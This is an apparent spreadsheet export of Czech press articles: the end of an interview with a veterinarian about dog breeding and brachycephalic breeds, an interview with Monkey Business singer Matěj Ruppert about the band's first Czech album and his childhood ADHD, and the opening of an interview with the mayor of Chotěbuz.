unie . Ale lidi se často nechají zblbnout. „To byl pátý z vrhu, narodilo se jich sedm a jenom čtyři dostali papíry.“ Ale to je nesmysl. Buď dostane papíry celý vrh, nebo nikdo. A co nehoda? „On mi nakryl fenku.“ Dneska už jsou možnosti, jak přerušit nechtěnou březost i feny. To, že fenka musí za život aspoň jednou zabřeznout, je mýtus? Ano. To je úplně jedno. Nemusí mít štěňata, aby prožila dobrý život. Jedním z vašich témat jsou i přešlechtěná plemena. Ani tady se situace nezlepšuje? Díky osvětě od touhy mít chrčícího přidušeného mopslíka lidé neustupují? Bohužel moc ne. Čumák krátkolebých zvířat je podobný lidskému obličeji, lidem to připadá roztomilé. Ale zvíře nemá vypadat jako člověk. Snažím se dělat osvětu. Na přednáškách ukazuji, jaké dýchací potíže psi mají. Snažím se přesvědčit majitele, že by tito psi už neměli jít do chovu. Zkracuje se jim sice lebka, ale nezmenšují se jim měkké tkáně. Mají velký svalnatý jazyk, dlouhé měkké patro, když jim uděláte CT, vidíte, že na dýchání jim zbývá malá dírečka. Když se dusí dítě, nikomu to roztomilé nepřipadá, když se dusí pes, někteří se nad tím rozplývají. Někde už je ale chov zakázaný, snad bude tento trend pokračovat. Zatím se ale lebka pořád zkracuje. Mops z 19. století je úplně jiné zvíře než dnes. Stejně tak krátkolebé kočky. Na začátku 20. století vyhrávaly soutěže perské kočky, které měly krásné obličeje, dnes mají perské kočky vmáčklý čumák a nejsou schopné se pořádně nažrat. Vidím obecně hodně případů, kdy si lidé pořizují zvíře jako módní doplněk. Ale… Ano, taky jsem si taky pořídila bengálského kocoura proto, že se mi líbil, jak jsem vám přiznala. Ale pak jsem se snažila udělat vše pro to, aby byl spokojený, abych na něj měla čas a on měl dost pohybu. ■ Svým mazlíčkům ve jménu lásky a péče ubližujeme překrmováním či nedostatkem, nebo někdy naopak přemírou pohybu. A ani to neustálé mazlení není dobrý nápad. Rozhovor s Martinou Načeradskou je součástí knihy Lenky Vrtiškové Nejezchlebové Zvířata v éře lidí, která je v prodeji v e-shopu Deníku N. „Pokud se chceme dozvědět něco nového, a ne jen posilovat naše apriorní představy, jak člověk škodí (nebo eventuálně neškodí) přírodě, je možná nejlepší ptát se lidí, kteří se přírodou a zvířaty přímo zabývají. To přesně udělala Lenka Vrtišková Nejezchlebová v této knize. Výsledek je docela ohromující,“ píše v úvodu knihy biolog a šéf České společnosti pro ekologii David Storch . Martina Načeradská Veterinární lékařka, specialistka na poruchy chování psů a koček. Provozuje vlastní veterinární kliniku. Zaměřuje se zejména na stomatologii a cytologii. Je členkou několika odborných organizací a autorkou či spoluautorkou mnoha publikací v oboru. FOTO: GABRIEL KUCHTA, DENÍK N Už dobře víme, že psi vychovávaní lidmi jsou mnohem agresivnější než divocí psi nebo vlci vychovávaní smečkou. Smečka funguje na základě komunikace, ne dominance za každou cenu. Autor: LENKA VRTIŠKOVÁ NEJEZCHLEBOVÁ redaktorka Deníku N Autor Lenka Vrtíšková Nejezchlebová Rubrika transition_slide KONTEXT</t>
  </si>
  <si>
    <t>20241101_704_3239762237_a3e58d8bae3fb614b2b3.html</t>
  </si>
  <si>
    <t>a3e58d8bae3fb614b2b3</t>
  </si>
  <si>
    <t>Jsem sebestředné hovado</t>
  </si>
  <si>
    <t>Jsem sebestředné hovado Rubrika: rozhovor Jako dítě málem skončil ve zvláštní škole, ale později získal pedagogické vzdělání. Z dráhy učitele jej svedlo osudové setkání s pozdějším spoluhráčem Pavlem Mrázkem. Nakonec je MATĚJ RUPPERT (46) frontmanem jedné z nejoriginálnějších českých kapel Monkey Business, která po čtvrtstoletí existence přednedávnem vydala své vůbec první album v češtině Když múzy mlčí. Proč až teď a jaké záludnosti tahle změna přinesla? Jak své pedagogické vzdělání uplatňuje u svých dvou dcer a proč o sobě mluví jako o sebestředném? ■ Kapela Monkey Business , jejíž součástí jste v podstatě od úplného začátku, trvá pětadvacet let. To už je víc než manželství, ne? Je pravda, že s kluky a holkami z naší kapely se znám už delší polovinu svého života. A konkrétně s Romanem (Roman Holý, skladatel a kapelník Monkey Business i J.A.R., pozn. red.) trávíme hodně času i mimo kapelu. I když kapelu vlastně tak trochu řešíme pořád. Roman je totiž strašně výkonný workoholik, což myslím v tom nejlepším slova smyslu. On je prostě mimořádně pracovitý člověk. A zatímco pro spoustu pracovitých lidí může být příznačné, že se časem vyčerpají, že prostě ta jejich žíla vyschne, u něj nepřestávám žasnout nad tím, jak pořád přichází s něčím novým. Například když jsem naši novou desku slyšel s časovým odstupem od nahrávání, vlastně jsem zůstal v úžasu, jak to ještě různými drobnými úpravami dotáhl a zdokonalil. A znovu mě překvapily i některé melodie, sled akordů… On je fakt obdivuhodný člověk a já mám ohromný štěstí, že jsem jeho kamarád. ■ Poprvé za to čtvrtstoletíjstepřišli s českými texty písní. Co se stalo? Není to úplně nová myšlenka, už jsme o tom uvažovali víckrát a zhruba před deseti lety jsme se o to i vážně pokoušeli, ale nedopadlo to. Tentokrát s tím Roman přišel v podstatě direktivně – buď česky, nebo vůbec. Já tak nějak tušil, že to k tomu směřuje, ahlavnějsemseobával, abychom se na těch českých textech nezasekli a nedělali tu desku čtyři roky. Právě kvůli té zkušenosti z minula, kdy jsme obvolávali různé textaře a prostě to nešlo. Romanovo direktivní rozhodnutí ale bylo skvělé v tom, že už jsme o angličtině v podstatě vůbec neuvažovali. Zřejmě to byl ten zlomový okamžik a správný impulz, kdy náš spoluhráč Pavel Mrázek, který do té doby textoval v angličtině, vytáhl svůj bloček s tématy, a my jsme jen třídili, co bychom tam chtěli, a co ne. Nakonec s drobným přispěním Romana , Dana Bárty i Terezy Černochové , jež si otextovala sama téměř celou svou poslední sólovku, napsal Pavel celé album a byla z toho paradoxně nejrychleji udělaná deska v historii Mankáčů. ■ Vícero písněmi se tak trochu prolíná krize středního věku, téma rozvodů a rozchodů… Ano, zpíváme o tom, co žijeme, a myslím, že tak by to mělo být, i když nemusí, samozřejmě. Dá se zpívat i o něčem, co vás zajímá jen tak zpovzdálí. Když jsme na minulé a předminulé desce vydali písně s názvy jako Freedom On Sale (Svoboda na prodej, pozn. red.) nebo Bad Times For Gentlemen (Špatné časy pro džentlmeny, pozn. red.), pár lidí nás začalo označovat za politickou kapelu. Tak to není, prostě jenom pozorujeme svět kolem nás a nějak ho reflektujeme. Ale vždycky jsme byli daleci toho někomu něco přikazovat nebo říkat, co a jak dělat. Ukazujeme náš pohled na svět, a politika nebo společenské otázky jsou jeho nedílnou součástí, takže je logické, že se k nim nějak vyjadřujeme. A zrovna písnička Bad Times For Gentlemen je bohužel v současnosti možná ještě aktuálnější než v době svého vydání, kdy tu ještě nebyl ani konflikt na Ukrajině , ani krize na Blízkém východě . Dneska tu máme tohle všechno, a k tomu Severní Koreu a Írán , které společně s Ruskem v podstatě otevřeně vyhrožují celému světu. Je tedy logické, že to na nás na všechny doléhá. Zároveň jsem ale přesvědčený, že jsme to vždycky reflektovali s určitou nenucenou lehkostí, protože věříme tomu, že s humorem se prostě život dá přežít líp. Zároveň si však uvědomujeme, že někdy už ani ten humor nestačí. ■ A múzy mlčí… Je název vaší desky odkazem na verš Karla Kryla ? Je. A víte, co je vtipné? Já to nejdřív vůbec nepochopil. ■ Ono to má více rovin… Má, a protože jsem jako každá správná rocková hvězda sebestředné hovado, když mi Roman sdělil nápad, aby se deska jmenovala Když múzy mlčí, volal jsem mu a říkám: „ Romane , neblbni, ty vole, dyť na tý desce, tamtozpívá, hraje, dyťtamtymúzy stříkaj!“ A Roman chvíli mlčel a pak jen odtušil, ať si to ještě jednou přečtu a zapřemýšlím nad tím… Pak mi to secvaklo a došel jsem k tomu, že ten název vlastně úplně dokonale vystihuje pocit, který teď všichni tak trochu máme, ale zároveň v něm zůstává hravost i ta lehkost. A co se týká těch témat, ano, jednou z nejoblíbenějších písniček mojí ženy a mých dětí je Prima rozvod, což prostě souvisí s životní zkušenostívětšiny členů kapely včetně mě. ■ Vy jste si naštěstí rozvod odbyl v mladém věku a jako bezdětný… Ano, a přestože jsem ho inicioval já, takže bych teoreticky mohl být ten „v pohodě“, nebyl jsem. Prostě pokud jste lidská bytost a vnímáte, že ten druhý je smutný, bolí to i vás. Byť jsme s mojí první ženou Karolínou měli to štěstí, že jsme se rozváděli jako bezdětní, takže to všechno bylo daleko jednodušší. Nicméně prošel si tím i Roman a ani Pavel Mrázek (baskytarista kapely, pozn. red.) v té době neprožíval úplně jednoduché partnerské soužití, a to všechno se na desce logicky podepsalo. Fór je v tom, že konkrétně zrovna Prima rozvod je veselá disco písnička a poslední verš refrénu zní „Slzy skrývám, líbám tchyni“, z toho je myslím patrné, v jakém duchu k tomu přistupujeme. Oproti tomu Roman si na rozdíl ode mě živě vybavuje slavnou píseň Hany Hegerové Rozvod, ze které byly všechny holky za jeho studií konzervatoře totálně rozervané, protože to byla partnerská krize navážno, z pohledu ženy, že jo. A navíc nádherný šanson. Tak my jsme se prostě rozhodli přistoupit k tomu jinak. ■ Jak vás napadla píseň Dva na kolejích? To je taková naše připomínka filmu Dáma na kolejích, který ne že by byl úplně zapomenutý, ale myslím, že je neprávem dost opomíjený a nedostává se mu takové pozornosti, jakou by si zasloužil. Přitom podle mě je to jeden z nejlepších českých filmů vůbec. Je prostě špičkově napsaný, zrežírovaný i zahraný. Když jsem ho viděl jako dítě, neměl jsem z toho rozum, považoval jsem to za takovou bláznivou komedii s písničkami. Ale on je to poměrně tvrdý film o krutosti života a ten závěr, kdy se hlavní hrdinka v podání Jiřiny Bohdalové vrací ze světel reflektorů zpátky do tramvaje, je opravdu mrazivý. A protože protipólem Jiřiny tam byl Radoslav Brzobohatý , napadlo Pavla Mrázka rozehrát příběh „dva na kolejích“, kteří se ocitli u nějaké životní výhybky. A jak nás upozornila Tereza Černochová , vedle toho technického názvosloví, co baví nás chlapy, je tam vlastně i určitá romantika spojená třeba s noční tramvají, jež často skrývá různé smutné příběhy. ■ No vida, co všechno vám čeština umožnila… Ano, je na tom krásně vidět, že to rozhodnutí bylo správné, mně samotnému se o těch textech taky daleko líp mluví, protože i kdybych anglicky uměl sebelíp, není to moje mateřština, nevychytám různé nuance. V češtině rozumím každému písmenu, každou čárku v souvětí umím zhodnotit. Samozřejmě je v tom i ta motivace, že nám budou lépe rozumět i naši fanoušci, a mohli by přibýt i nějací noví. Vlastně jsem až překvapený, jak moc nám čeština sluší, a jediné, co mě opravdu štve, je, že jsme to neudělali třeba už na šesté desce. ■ Asi nebyl ten pravý čas, koneckonců jste se o to někdy před dvanácti lety opravdu snažili… Snažili, ale málo. Neboli: začnu zítra, ale nebuďte mě moc brzy. (smích) ■ Pokud si ovšem dobře vzpomínám, když jste zkoušel zpívat česky úplně na počátku Monkey Business, někdo z kapely vám řekl, že v češtině zníte jako Michal Penk ,avástoúplně zablokovalo… Jo, to byl právě Pavel Mrázek, tahle jeho hláška mě na pár let opravdu zničila. Ale to jsem si vyřešil už před lety, když jsme s Romanem uskutečnili takový rockovější projekt Neruda, kde jsem taky zpíval česky. Zhudebnili jsme tehdy mimo jiné texty disidentského básníka Fandy Pánka a taky Ivana Wernische a možná jeden z posledních textů nám napsal Pavel Vrba , se kterým jsme v té době docela dost popíjeli. Tehdy jsem se paradoxně ani nezarazil kvůli tomu, že mám kvazi mindrák z češtiny. ■ Nejste ovšem jediný, kdo má tuhle zkušenost. Čím to je, že v češtině může zpěv znít jinak než v angličtině? Těžko říct, pro mě osobně to bylo spíš o tom, jakou cestou k té češtině dojdu. Pokud bych o tom příliš přemýšlel, byl by to paradoxně větší problém. Na natáčení naší poslední desky jsem se zasekl vlastně u jediné písničky, a to je Ciao! Ciao! Ciao!, kde jsem vůbec nemohl přijít na to, jak tu svou sloku zazpívat. Jako bych měl najednou problém, že je to pro mě moc vysoko. Přitom jsem cítil, že v angličtině by mi to tak nepřipadalo. A tehdy se projevil můj problém s leností. Uvědomil jsem si, že jsem dobrých šest let nebyl u své hlasové poradkyně, že jsem vlastně hřešil na to, že neustále koncertujeme, takže jakoby trénuju pořád. Jenže během covidu jsem třeba tři měsíce nezpíval vůbec, a to se na hlasivkách projeví, je to zkrátka sval, který je potřeba trénovat. Neboli: kdybych býval trénoval, měl bych ruku jako Vémola. Nemám, protože jsem líný. Ale jelikož hlas je pro mě podstatný a umožňuje mi být líný v těch ostatních oblastech, bylo by dobré, abych aspoň v jeho trénování líný nebyl. Takže jsem začal chodit na hodiny zpěvu. Po několikaleté pauze jsem opětkontaktoval svou hlasovou poradkyni Hanku Peckovou a naordinoval jsem si s ní intenzivní nalejvárnu. A pomohlo to. Někdy ten blok prostě může přijít odněkud, odkud to vůbec nečekáte. Čeština má totiž úplně jiný rytmický kód než angličtina, a když ji použijete do rytmického klíče anglosaské hudby, do níž funk a moderní pop spadá, může to být problém. Ale jak jsme zjistili, jde to. Jen je to těžké. A ještě jedno úskalí čeština má. Jak jí všichni rozumíme, je vlastně nahatá. V angličtině se dá spousta věcí skrýt. Čeština je oproti tomu naprosto tvrdá. A taky tu máme spoustu slov, která už jsou nějak zprofanovaná, třeba láska nebo mír. Nicméně Pavel předvedl, že i o lásce se dá zpívat tak, aby to nebylo fádní nebo patetické. Začátek Prima rozvodu zní třeba takhle: „Oči ti, lásko, nějak zvláštně září, že ty chceš se mnou dovádět? Ach, jak se krutě člověk někdy mýlí, ty se chceš prostě jenom rozvádět.“ ■ Přednedávnem začal další školní rok a školou povinnou se stala i vaše mladší dcera. Co vás na rodičovství nejvíc zaskočilo? Tak já očekával leccos, vzhledem k tomu, jak do mě kamarádi i kolegové pořád hustili takové to osvědčené blbé moudro „nedělej děti, nebudeš mít starosti“. Ale pravda je taková, že na roli rodiče člověk prostě nemůže být připravený nikdy. Úplně nejvíc mě asi dostává ten strach. Ne že by se člověk každou sekundu příšerně bál a byl pořád rozklepaný. Ovšem je to taková podprahová bázeň, obava, aby se dětem něco nestalo, aby z nich něco vyrostlo, aby byly báječný, což moje děti jsou, ale stejně má člověk někde vzadu takový pocit, asi je to tíha odpovědnosti. Prostě chcete, aby byly šťastné, prožíváte s nimi každou bolest, což je u holek zvlášť palčivý. Každou chvíli se diví, co tahle spolužačka udělala nebo proč tohle ten kluk řekl, to mi vždycky srdce ustrne a snažím se jim vysvětlit, že život je holt takový a neskládá se jen ze slunečných dnů. A pak je tu samozřejmě obava z toho, abych byl dobrým rodičem, pro což je to moje pedagogické vzdělání mimořádně nevhodné. ■ Jakto? To jsem myslel v legraci, i když určitým způsobem to tak možná je. Málo rodičů si třeba uvědomuje, že svoje dítě můžou frustrovat i nadměrnou péčí. Všichni samozřejmě víme, jak je hrozné, když se v rodinách děje nějaké násilí nebo psychické týrání. Jenže přehnaná starostlivost nebo i vyzdvihování, přehnaná volnost může ve finále dítěti taky hodně uškodit. Společnost je mnohovrstevnatá, a když budete svému dítěti neustále opakovat, že je nejlepší na světě, i když to zdaleka není pravda, může ho to v pozdějším věku dost determinovat. Stejně tak je důležité nepromítat do dětí svoje ambice. Toho se mi snad daří vyvarovat i díky tomu, že sám se v tom ohledu cítím saturovaný. Prostě zdravým způsobem nechat děti být, aby si našly svou cestu samy, případně jim pomoct s tím hledáním. Nevím, mí rodiče mi říkají, že jak mě tak pozorují, nemám se prý čeho bát. Jenže k rodičovství ten strach prostě patří. ■ To je od vašich hezké vyznamenání. Snad jo, protože moji rodiče jsou ti nejlepší rodiče na světě, beru to jako pochvalu. Ale to není důležité, důležité jsou ty děti. ■ Vaši to s vámi taky neměli úplně snadné, trpěljste poruchou ADHD, o nížse toho tehdyještě mocnevědělo… Hlavně se to absolutně neslučovalo s tím, že školní systém před revolucí nereflektoval, že každé dítě je jiné, naopak se vyžadovalo, aby všichni žáci spořádaně a tiše seděli, skoro jako roboti, a jakákoliv individualita se potírala, což je vlastně typické pro všechny diktátorské režimy, ty komunistické nevyjímaje. Já měl ovšem ohromné štěstí právě v tom, že mám opravdu fantastické rodiče, kteří za mnou vždycky stáli. Samozřejmě mi taky uměli dát najevo, když jsem něco podělal, ale co se týká mých tehdejších potíží ve škole, byli naprosto nekompromisní. Všechny učitelky narážely na zeď v podobě mé matky, která, jak sepak dozvěděla, měla přezdívku„matka Vlčice“. Musím říct, že některé ty historky, co jsem od mámy slyšel, jsou z dnešního pohledu úplně absurdní. Byl jsem prostě divoké dítě, které mělo na prvním stupni problém vydržet pětačtyřicet minut sedět v lavici. Běžně jsem teda dělal to, že jsem se najednou zvedl, vyběhl ze třídy, pět minut pobíhal po chodbách a pak jsem se normálně zase vrátil do lavice. Pro tehdejší učitelky byl tohle bohužel nepřekonatelný problém. Přitom se to dalo lehce vyřešit tím, že by mě třeba poslaly někam s třídnicí. Jenže to se dělo jenom za odměnu, to mně opravdu nehrozilo. Tohle všechno už se dneska ví a pracuje se s tím úplně jinak. Tenkrát mi ale chtěli předepsat léky a poslat mě do zvláštní školy. Prošel jsem několika pedagogicko-psychologickými poradnami a nakonec se mámě přes její známou podařilo dostat mě k profesoru Zdeňku Matějčkovi , což je dodnes uctívaný nestor dětské psychologie. Ten mě vyšetřil, provedl se mnou pár testů a napsal mi posudek, se kterým už nikdo nemohl polemizovat. Vyplývalo z něj, že jsem úplně normální dítě s lehkou mozkovou dysfunkcí a hyperaktivitou. Mámě řekl, že prášky si může vzít leda paní učitelka, aby měla víc trpělivosti, do mě ať je rozhodně necpou a neházejí svoje starosti na hlavu mou a mých rodičů. Měl jsem fakt kliku. ■ Objevil u vás profesor Matějček už tehdy sklony k hudbě? To přímo ne, ale máma mi vyprávěla, že když jí tehdy po mém vyšetření vysvětloval co a jak, že holt budu mít asi problémy s pravopisem a násobilkou kvůli dysgrafii a dysortografii, což se na druhém stupni může srovnat a škola by to měla zohlednit. Prostě ji uklidňoval, že všechno bude v pořádku, protože to nejdůležitější, co potřebuju, je láska, a pokud ona byla schopná dostat mě až k němu, pak milující máma rozhodně je a všechno bude fajn. Taky jí kladl na srdce, aby mi nezakazovala kamarády, že jich vzhledem k těm mým trablům asi nemám bůhvíkolik, protože děti umějí být kruté, když se někdo liší, a že já sám dřív nebo později poznám, kdo za to stojí. A nakonec mámu požádal, jestli si může schovat jeden můj obrázek, který si ode mě nechal podepsat, že si totiž myslí, že ze mě jednou něco bude. ■ Vzhledem k tomu, že zemřel v roce 2004, stihl se dozvědět, že to trefil, že? No, s tím se pojí taková zajímavá věc. Když mi bylo nějakých osmnáct devatenáct, vracel jsem se večerní tramvají z nějakého mejdanu, měl jsem v sobě pár piv a panáka, stál jsem, poslouchal walkmana, a najednou koukám, že pode mnou sedí profesor Matějček . Napadlo mě, že bych ho měl nějak oslovit, poděkovat mu, aonnajednouzvedl hlavuaříká:„Nazdar, Matěji , tak jak se máš?“ Když jsem si uvědomil, kolik stovek dětí mu muselo projít ordinací, a on si mě pamatoval… ■ Dalším krokem k vaší hudební kariéře byl folklorní soubor Rosenka, kam vás taky přihlásila maminka. Nejzásadnější ovšem bylo vaše setkání s budoucím spoluhráčem z Monkey Business Pavlem Mrázkem… Přesně tak. Předtím jsme ještě měli kapelu s bráchou, ale s tou jsme odehráli asi jen dva nebo tři koncerty, brácha je o osm let starší, stejně jako ostatní spoluhráči, takže jsme se hudebně trochu míjeli. Pak jsem ještě někde v hospodě narazil na partičku lidí z kapely Leguar GR, se kterou jsem zpíval skoro čtyři roky. To už jsme hráli i po nějakých klubech, pamatuju si Roxy , kam přišlo asi padesát lidí, připadalo mi to naprosto úžasný. No a Pavla jsem pak potkal, když jsem při škole dělal různé brigády na natáčení reklam a filmů, takového kluka pro všechno, té pozici se říká runner. Postupně jsem se vypracoval na druhého asistenta režie a tehdy jsem se seznámil s Pavlem , ten dělal asistenta kamery. Začali jsme se bavit o muzice a zjistili jsme, že máme podobný vkus. Já tehdy na dotočných posilněný alkoholem vždycky zpíval, předváděl jsem fistulí Bee Gees a podobně, Pavlovi se to zdálo dobrý, a jednou přišel s tím, že s Romanem Holým zakládají novou kapelu, shánějí zpěváka, a jestli bych nezávazně přišel na zkoušku. Já Romana samozřejmě znal, takže se mi roztřásla kolena. Pavel mi tehdy poradil jednu věc, které jsem se držel, a možná mi ji ani nemusel radit. Řekl mi, ať hlavně hned nezačnu zpívat. Že prý tam pártakových bylo, co začalizpívat, anižby si vůbec poslechli, jaká hudba hraje. A tak jsem tam šel, zaimprovizoval, a můj život se krásně otočil. ■ Jaké bylo vaše první setkání s Romanem Holým ? Tak Roman , kromě toho, že je úžasně talentovaný, je taky velmi charismatický člověk a silná osobnost, což je z něj cítit okamžitě. Málokdo ale ví, že je zároveň velmi přátelský. To mi dost pomohlo, protože jsem z něj přece jen měl trému. Obdivoval jsem ho jako moderátora Kinoboxu, který jsme sledovali už s kámoši na základce každý čtvrtek a druhý den ve škole jsme si pak přehrávali scénky, co tam Roman s panem Kohoutem předváděli. Takže když jsem pak najednou před ním stál, navíc v době, kdy kulminovala sláva Sexy Dancers a J.A.R. byli téměř kultovní kapela, byl jsem z toho samozřejmě jak opařený, ale on to okamžitě dokázal rozproudit. A když jsem pak začal zpívat a po pár minutách přestala fungovat technika, řekl jen: „Ježiš, to je škoda, teď to znělo tak pěkně, no nic, berem tě.“ Myslím si, žeRoman má ještě jednu důležitou vlastnost, a to tu, že umí dobře otipovat lidi, což je při zakládání nové kapely taky ohromně důležité. Lidská stránka je totiž kolikrát možná důležitější než to, jak dobrý je ten člověk hudebník. Pro to, aby kapela mohla fungovat pětadvacet let, určitě. A možná měl o mně taky dobrozdání od Pavla . (smích) ■ V jednom z posledních rozhovorů o vás doslova řekl, že máte jedinou vadu, a to, že nejste nafoukaný jako správná rocková hvězda… (smích) To má asi pravdu. Já sám ale za svou vadu považuju spíš to, že jsem líný. A na to mi Roman říká, že to je u rockových hvězd v pořádku. ■ Jak vás vůbec napadlo jít zrovna na pedagogickou školu? Klasika, s tou mojí mozkovou dysfunkcí to na gymnázium a následně vysokou moc nevypadalo, byť na jednom gymplu jsem skončil jen těsně pod čarou. Samozřejmě jsem ale stál o to, mít maturitu. A tehdy mi poradila teta Miládka, která peďák sama vystudovala a věděla, že na přírodní vědy, co mi tehdy moc nešly, se tam neklade takový důraz. Paradox je, že dneska mě oblasti jako matematika nebo astrofyzika, a dokonce i chemie baví moc. Nicméně díky peďáku a povinné praxi v mateřské škole jsem zjistil, jak těžká profese učitele je. Překvapivě psychicky i fyzicky. A ta obrovská zodpovědnost, to si nikdo nedokáže představit, v podstatě jste neustále jednou nohou v kriminále. Když jsem míval ranní směnu, a to jsem byl jen k ruce jiné učitelce, přišel jsem domů ve tři hodiny jak spráskaný pes, lehl jsem si a probudilse o půlnoci. Je špatně, že je tento obor dodnes tak špatně ohodnocený. Ale to je další dědictví komunismu. Ačkoliv se bolševici tvářili jako velcí feministi, podle nichž jsou si všichni pracující rovni, oni sami to nejvíc popírali. Ženy podle nich byly méně výkonné, tím pádem automaticky dostávaly nižší platy, a chlapy vyhnali do továren a do strojírenství. Přitom do 50. let bylo učitelství skoro výsadou mužů. Pak se to takhle nesmyslně otočilo a ze školství kvůli tomu odešly peníze, protože ženám se automaticky dávala polovina toho, co dostávali muži. Tohle je taky jedna z mála věcí, které bych vytkl porevolučnímu vývoji, že všechny politické garnitury napříč politickým spektrem v podstatě na školství kašlaly. Přitom by potřebovalo spoustu změn. Musíme děti vést ke kritickému myšlení. Vzorce a data si dneska během pár sekund vygúglí, ale je potřeba učit je tu spoustu informací zpracovávat, třídit a aplikovat. Abychom pak nepotkávali čím dál víc lidí, co věří, že Země je placatá. ■ Mimochodem, jaké jsou vlastně kořeny vašeho příjmení? Někdykolem 90.rokujsmetořešilisnaším učitelem dějepisu a češtiny, který se zajímal o genealogii. Mimochodem skvělým, byl to právě ten typ, co byl na nás ze začátku jako pes, ale díky tomu si vybudoval autoritu a po pár měsících z něj byl jeden z našich nejoblíbenějších učitelů. Uměl výklad prošpikovat různými historkami, jež tu látku dělaly úžasně zajímavou. Tak s ním jsme tehdy došli k tomu, že Ruppert má anglo-germánský původ a zřejmě vznikl přesmyčkou jména Robert. ■ Takže žádný americký dědeček? Ne. Až časem mi došlo, že to vlastně asi zní cizokrajně, sám jsem to nikdy neřešil, přitom mě vždycky fascinovalo jméno Franka Zappy , ta dvě p, říkal jsem si, to je jméno do showbyznysu.Teprve Karel Svoboda mi takzvaně otevřel oči. Ke sklonku života jsme se s ním jako kapela docela často vídali, několikrát s námi i hrál a myslím, že nás měl rád stejně jako my jeho. A jednou, když jsem byl na návštěvě u něj v Jevanech , poslouchali jsme muziku, on vyprávěl, kde všude byl a s kým spolupracoval, úžasně zajímavé historky, protože kromě toho, že to byl talentovaný skladatel, byl to i zajímavý chlapík a dobrý vypravěč, a najednou se mě mezi řečí zeptal, jestli Matěj Ruppert je moje skutečné jméno. Vůbec jsem nechápal, na co se mě to ptá. A on na to, že to je prostě úplně fantastické jméno do showbyznysu. Přitom já jsem svoje jméno v dětství samozřejmě nenáviděl. „ Ruppert , včera si uprd, Matěj , kozí bobky platěj“, to bylo na základce na denním pořádku. Ale nikdy by mě nenapadlo dávat si pseudonym, a dneska mám svoje jméno moc rád. Foto:Tomáš Krist/MAFRA Foto:Profimedia.cz, ČTK „Naštěstí jsme se rozváděli s první ženou bezdětní.“ Matěj Ruppert a zakladatel kapely Monkey Business Roman Holý při křtu jednoho z alb (na snímku je s nimi ještě zpěvačka Misha). „Roman je úžasně talentovaný a velmi charismatický člověk a silná osobnost, což je z něj cítit okamžitě,“ chválí svého kamaráda i souputníka Matěj . ◄ Matěj Ruppert , frontman kapely Monkey Business , která začala hrát v roce 1999. Na snímku s ním je Tereza Černochová , která se skupinou vystupuje deset let. Mimochodem anglické Monkey Business znamená „zlomyslnost“, „lumpárna“ či „darebáctví“. Foto:Profimedia.cz,archivE.Ridiho „Dítěti může přehnaná volnost hodně uškodit.“ Hrají už čtvrt století, vlevo vystoupení před více než dvěma desítkami let, vpravo před několika měsíci. Na obou snímcích je Matěj Ruppert a v pozadí zakladatel kapely Roman Holý . „Měl jsem problém vydržet 45 minut sedět v lavici.“ Zpěvák Matěj Ruppert a kuchař Emanuele Ridi vyrážejí už léta s televizním pořadem Manu a Matěj na gastronomický tah po italských regionech. Snímek je z Alberobella. Toto unikátní městečko se nachází nedaleko jihoitalské metropole Bari a od roku 1996 je na seznamu památek chráněných UNESCO. ▼ Před dvěma desítkami let… Tonya Gravesová a Matěj Ruppert , zpěváci Monkey Businessu, při koncertu v pražské Lucerně v roce 2003. Foto: ČTK „Vyšetřil mě nestor dětské psychologie prof. Matějček .“ „Za svou vadu považuju, že jsem líný.“ Foto:Profimedia.cz Na začátku října se v Plzni konal festival Pilsnerfest k oslavě 172. výročí založení tamního pivovaru. Mezi gratulanty byl i zpěvák Matěj Ruppert . Autor: Helena Cejpová Autor Helena Cejpová Rubrika transition_slide rozhovor</t>
  </si>
  <si>
    <t>20241101_705_3239762273_ea4c4515304fed2baf72.html</t>
  </si>
  <si>
    <t>ea4c4515304fed2baf72</t>
  </si>
  <si>
    <t>CHOTĚBUZ STÁLE V POHYBU</t>
  </si>
  <si>
    <t>CHOTĚBUZ STÁLE V POHYBU Pane Haroku, ve funkci starosty jste druhé volební období, jak jste se sžil s tím, že pokračujete ve starostování? Funkci starosty vykonávám již šestým rokem. Myslím si, že oproti minulému období tuto funkci vykonávám světším klidem. Doadministrativy úřaduužjsemzapracovaný, spousta problémů nebo situací se opakuje a já mohu vycházet ze svých předchozích zkušeností a úspěšných řešení. Navíc už lze vidět ovoce z předchozích let, což mě opět nabíjí amotivujekdalší práci. Na co jste ve své funkci nejvíc pyšný? Nejvíc mě samozřejmě potěší, když se něco povede a mohu vnímat dobrou zpětnou vazbu zestrany občanů. V tomto volebním období se podařilo najít vyrovnaný tandem starosty a místostarostky, kterou je paní Marie Walachová . Sám se orientuji na technické záležitosti, takže koordinuju stavební akce a rekonstrukce. Paní místostarostka se zaměřuje na kulturní život v obci, organizaci menších nebo větších akcí, kde se mohou občané potkat.A když se věci hýbou kupředu, opravují se cesty, stavějí se chodníky, probíhá péče o zeleň, a přitom je možnost se potkat aneformálně poklábosit - to je dobrý mix pro spokojenost občanů. Aktivně jsme se pustili do výstavby chodníků v obci. Ono se to zdá, chodník v obci je samozřejmost,ale není tak snadné tuto liniovou stavbu projekčně připravit, dohodnout se s majiteli pozemků na záboru a získat financování na tuto velice nákladnou akci. Díky dobrému týmu v sestavě zastupitelé, radní, projektant a projektový manažer se nám podařilo do mašliček připravit krásný projekt několika částí chodníků. Aktuálně jsmevprocesu výstavby, ale už se těším, ažsepo něm poprvé oficiálně po jeho zkolaudování projdu. Co se týká našeho kulturního života, kdysi jsme každoročně pořádali obecní ples.Poslední dobou se nám však nedařilo naplnit kapacitu sálu. Nově dvakrát ročně organizujeme taneční párty s názvem„Hity z kazeťáku“. O zábavu je takový zájem, že jsou vstupenky vyprodané pár dnů po spuštění prodeje.A často slýcháváme připomínky, abychom přidali minimálně ještě jeden termín v roce. Také jsme letos poprvé měli v Chotěbuzi letní kino.Nejprve nám s organizací pomáhala agentura. Druhé promítání bylo na bedrech paní místostarostky. Moc mě potěšil velký zájem ze strany občanů. Nešlo ani o to, že bychom promítali nějaké velké trháky. Lidé si prostě přišli v sobotu večer sednout do lehátka a užít si tu atmosféru.Dospělí si koupili pivo , děti popkorn a sledovali film. Celorepublikovým tématem jsou odpady, jak s odpady bojujete v Chotěbuzi ? Chtěli bychom občany motivovat k tomu, aby si uvědomovali, že odpad vhozený do popelnice není problémem jenom obce, která se musí postarat o zbytek. V první řadě by měl každý uvažovat, jaký produkt v jakém balení koupí, a zda obal bezmyšlenkovitě hodí do černé nádoby, nebo si dá prácistím, že obal roztrhá a jednotlivé jeho části roztřídí. Současně jsme spustili velkou kampaň v motivaci občanů ke třídění. Obec nakoupila žluté a modré nádoby a zdarma je 